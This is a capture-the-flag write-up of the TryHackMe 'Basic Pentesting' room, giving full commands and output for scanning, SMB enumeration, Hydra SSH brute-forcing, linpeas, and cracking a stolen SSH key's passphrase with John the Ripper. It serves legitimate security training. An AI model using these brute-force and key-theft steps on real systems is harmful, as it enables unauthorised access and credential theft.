# Basic Pentesting **Date:** 09, March, 2021 **Author:** Dhilip Sanjay S *** [Click Here](https://tryhackme.com/room/basicpentestingjt) to go to the TryHackMe room. ## Learning Objectives * In these set of tasks you'll learn the following: * brute forcing (Hydra, Gobuster) * hash cracking (JohnTheRipper) * service enumeration (enum4linux) * Linux Enumeration (Linpeas) *** ## Solutions ### Find the services exposed by the machine ```bash Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-09 21:26 IST Nmap scan report for 10.10.21.87 Host is up (0.17s latency). Not shown: 994 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) 8080/tcp open http Apache Tomcat 9.0.7 Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 16.07 seconds ``` *** ### What is the name of the hidden directory on the web server? * **Answer:** development * **Steps to Reproduce:** ```bash gobuster dir -u http://10.10.21.87 -t 100 -w /usr/share/wordlists/dirb/common.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.21.87 [+] Threads: 100 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2021/03/09 21:33:48 Starting gobuster =============================================================== /.hta (Status: 403) /.htaccess (Status: 403) /.htpasswd (Status: 403) /development (Status: 301) /index.html (Status: 200) /server-status (Status: 403) =============================================================== 2021/03/09 21:33:57 Finished =============================================================== ``` *** ### User brute-forcing to find the username & password 1. Running **Enum4Linux** - To enumerate SMB ```bash enum4linux -a 10.10.21.87 Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Mar 9 22:26:17 2021 ========================== | Target Information | ========================== Target ........... 10.10.21.87 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none =================================================== | Enumerating Workgroup/Domain on 10.10.21.87 | =================================================== [+] Got domain/workgroup name: WORKGROUP =========================================== | Nbtstat Information for 10.10.21.87 | =========================================== Looking up status of 10.10.21.87 BASIC2 <00> - B Workstation Service BASIC2 <03> - B Messenger Service BASIC2 <20> - B File Server Service ..__MSBROWSE__. <01> - B Master Browser WORKGROUP <00> - B Domain/Workgroup Name WORKGROUP <1d> - B Master Browser WORKGROUP <1e> - B Browser Service Elections MAC Address = 00-00-00-00-00-00 ==================================== | Session Check on 10.10.21.87 | ==================================== [+] Server 10.10.21.87 allows sessions using username '', password '' ========================================== | Getting domain SID for 10.10.21.87 | ========================================== Domain Name: WORKGROUP Domain Sid: (NULL SID) [+] Cant determine if host is part of domain or part of a workgroup ===================================== | OS information on 10.10.21.87 | ===================================== Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464. [+] Got OS info for 10.10.21.87 from smbclient: [+] Got OS info for 10.10.21.87 from srvinfo: BASIC2 Wk Sv PrQ Unx NT SNT Samba Server 4.3.11-Ubuntu platform_id : 500 os version : 6.1 server type : 0x809a03 ============================ | Users on 10.10.21.87 | ============================ Use of uninitialized value $users in print at ./enum4linux.pl line 874. Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877. Use of uninitialized value $users in print at ./enum4linux.pl line 888. Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890. ======================================== | Share Enumeration on 10.10.21.87 | ======================================== Sharename Type Comment --------- ---- ------- Anonymous Disk IPC$ IPC IPC Service (Samba Server 4.3.11-Ubuntu) SMB1 disabled -- no workgroup available [+] Attempting to map shares on 10.10.21.87 //10.10.21.87/Anonymous Mapping: OK, Listing: OK //10.10.21.87/IPC$ [E] Cant understand response: NT_STATUS_OBJECT_NAME_NOT_FOUND listing \* =================================================== | Password Policy Information for 10.10.21.87 | =================================================== [+] Attaching to 10.10.21.87 using a NULL share [+] Trying protocol 139/SMB... [+] Found domain(s): [+] BASIC2 [+] Builtin [+] Password Info for Domain: BASIC2 [+] Minimum password length: 5 [+] Password history length: None [+] Maximum password age: 37 days 6 hours 21 minutes [+] Password Complexity Flags: 000000 [+] Domain Refuse Password Change: 0 [+] Domain Password Store Cleartext: 0 [+] Domain Password Lockout Admins: 0 [+] Domain Password No Clear Change: 0 [+] Domain Password No Anon Change: 0 [+] Domain Password Complex: 0 [+] Minimum password age: None [+] Reset Account Lockout Counter: 30 minutes [+] Locked Account Duration: 30 minutes [+] Account Lockout Threshold: None [+] Forced Log off Time: 37 days 6 hours 21 minutes [+] Retieved partial password policy with rpcclient: Password Complexity: Disabled Minimum Password Length: 5 ============================= | Groups on 10.10.21.87 | ============================= [+] Getting builtin groups: [+] Getting builtin group memberships: [+] Getting local groups: [+] Getting local group memberships: [+] Getting domain groups: [+] Getting domain group memberships: ====================================================================== | Users on 10.10.21.87 via RID cycling (RIDS: 500-550,1000-1050) | ====================================================================== [I] Found new SID: S-1-22-1 [I] Found new SID: S-1-5-21-2853212168-2008227510-3551253869 [I] Found new SID: S-1-5-32 [+] Enumerating users using SID S-1-5-21-2853212168-2008227510-3551253869 and logon username '', password '' S-1-5-21-2853212168-2008227510-3551253869-500 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-501 BASIC2\nobody (Local User) S-1-5-21-2853212168-2008227510-3551253869-502 *unknown*\*unknown* (8) .. S-1-5-21-2853212168-2008227510-3551253869-1050 *unknown*\*unknown* (8) [+] Enumerating users using SID S-1-5-32 and logon username '', password '' S-1-5-32-500 *unknown*\*unknown* (8) .. S-1-5-32-543 *unknown*\*unknown* (8) S-1-5-32-544 BUILTIN\Administrators (Local Group) S-1-5-32-545 BUILTIN\Users (Local Group) S-1-5-32-546 BUILTIN\Guests (Local Group) S-1-5-32-547 BUILTIN\Power Users (Local Group) S-1-5-32-548 BUILTIN\Account Operators (Local Group) S-1-5-32-549 BUILTIN\Server Operators (Local Group) S-1-5-32-550 BUILTIN\Print Operators (Local Group) S-1-5-32-1000 *unknown*\*unknown* (8) .. S-1-5-32-1050 *unknown*\*unknown* (8) [+] Enumerating users using SID S-1-22-1 and logon username '', password '' S-1-22-1-1000 Unix User\kay (Local User) S-1-22-1-1001 Unix User\jan (Local User) ============================================ | Getting printer info for 10.10.21.87 | ============================================ No printers returned. ``` * We find two user names - `jan` and `kay`. * Now we'll try to bruteforce the password of `jan`. * Because, in the `/development` directory, we had a text file in which K (refers to kay) mentioned that the password of J (refers to jan) was easily crackable. 2. **HYDRA:** * Using **Hydra** to bruteforce the username and password * **Example:** `hydra -L users.txt -P passwords.txt ssh://$ip -t 4` * Options used and their explanations: * L flag - specifies a list of login names as file * l flag - login name * P flag - specifies a list of passwords * ssh://$ip - our target and protocol * t flag - number of parallel tasks to run ```bash hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.21.87 -t 4 | tee hydra.out Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-09 22:14:13 [DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task [DATA] attacking ssh://10.10.21.87:22/ [STATUS] 44.00 tries/min, 44 tries in 00:01h, 14344355 to do in 5433:29h, 4 active [STATUS] 28.00 tries/min, 84 tries in 00:03h, 14344315 to do in 8538:17h, 4 active [STATUS] 29.14 tries/min, 204 tries in 00:07h, 14344195 to do in 8203:23h, 4 active [STATUS] 28.07 tries/min, 421 tries in 00:15h, 14343978 to do in 8517:49h, 4 active [22][ssh] host: 10.10.21.87 login: jan password: armando 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-09 22:43:05 ``` 3. Nmap NSE **SSH-brute** was faster than hydra. ```bash nmap 10.10.21.87 -p 22 --script ssh-brute --script-args userdb=user.txt,passdb=/usr/share/wordlists/rockyou.txt | tee ssh-brute.out Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-09 22:22 IST NSE: [ssh-brute] Trying username/password pair: jan:jan .. Nmap scan report for 10.10.21.87 Host is up (0.17s latency). PORT STATE SERVICE 22/tcp open ssh | ssh-brute: | Accounts: | jan:armando - Valid credentials |_ Statistics: Performed 781 guesses in 636 seconds, average tps: 1.7 Nmap done: 1 IP address (1 host up) scanned in 665.56 seconds ``` 4. You can also use `msfconsole` to bruteforce the credentials. * We found `jan's password`:`armando`. *** ### What is the username? * **Answer:** jan *** ### What is the password? * **Answer:** armando *** ### What service do you use to access the server(answer in abbreviation in all caps)? * **Answer:** SSH *** ### Enumerate the machine to find any vectors for privilege escalation * We could find that there is a password backup file in kay's directory - `pass.bak`. But it has no read permission. * So, we'll try to run `linpeas.sh` to find possible vectors for priv esc. * `wget` linpeas.sh into any folder where you have the write permission. ```bash jan@basic2:$ ./linpeas.sh ... [+] Searching ssl/ssh files Port 22 PermitRootLogin prohibit-password PubkeyAuthentication yes PermitEmptyPasswords no ChallengeResponseAuthentication no UsePAM yes Possible private SSH keys were found! /home/kay/.ssh/id_rsa --> /etc/hosts.allow file found, read the rules: /etc/hosts.allow ... jan@basic2:/home/kay/.ssh$ cat id_rsa -----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75 . . . -----END RSA PRIVATE KEY----- ``` * After running, we find that the **SSH private key (id\_rsa) of Kay** has read permissions. * Copy the contents of the id\_rsa file. (Private Key) and store it in your local machine. * Try to login using the private key. * ssh -i flag - used for identity file. ```bash root@kali: ssh -i kay_id_rsa kay@10.10.21.87 Enter passphrase for key 'kay_id_rsa': ``` * It's asking for a password. But, we don't have it yet. *** ### What is the name of the other user you found(all lower case)? * **Answer:** kay *** ### If you have found another user, what can you do with this information? * **Answer:** We can try to escalate our privileges to gain **root access**. May be that user can have additional permissions which can be exploited to gain root access. *** ### What is the final password you obtain? * **Answer:** heresareallystrongpasswordthatfollowsthepasswordpolicy$$ * **Steps to Reproduce:** * Now, we'll try to brute force the ssh passphrase using `john`. * Convert the id\_rsa file using `ssh2john.py` so that it can be fed to John for **bruteforcing the passphrase**. ```bash root@kali: usr/share/john/ssh2john.py kay_id_rsa > forjohn.txt rrot@kali:john forjohn.txt --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Note: This format may emit false positives, so it will keep trying even after finding a possible candidate. Press 'q' or Ctrl-C to abort, almost any other key for status beeswax (kay_id_rsa) Session completed ``` * Login using the the ssh private key and provide the passphrase. ```bash root@kali: ssh -i kay_id_rsa kay@10.10.21.87 Enter passphrase for key 'kay_id_rsa': Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 0 packages can be updated. 0 updates are security updates. Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102 kay@basic2:~$ cat pass.bak heresareallystrongpasswordthatfollowsthepasswordpolicy$$ ``` *** ## References * [Hydra Cheatsheet](https://github.com/frizb/Hydra-Cheatsheet) * [Privilege escalation scripts](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/) * [Linpeas](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) * [Null Byte Article - Crack SSH private key passwords using John the Ripper](https://null-byte.wonderhowto.com/how-to/crack-ssh-private-key-passwords-with-john-ripper-0302810/) * Sometimes we can get the **private key (id\_rsa)** through a variety of scenarios, like if we had read access due to **LFI or even command injection** allowing us to execute certain commands. ***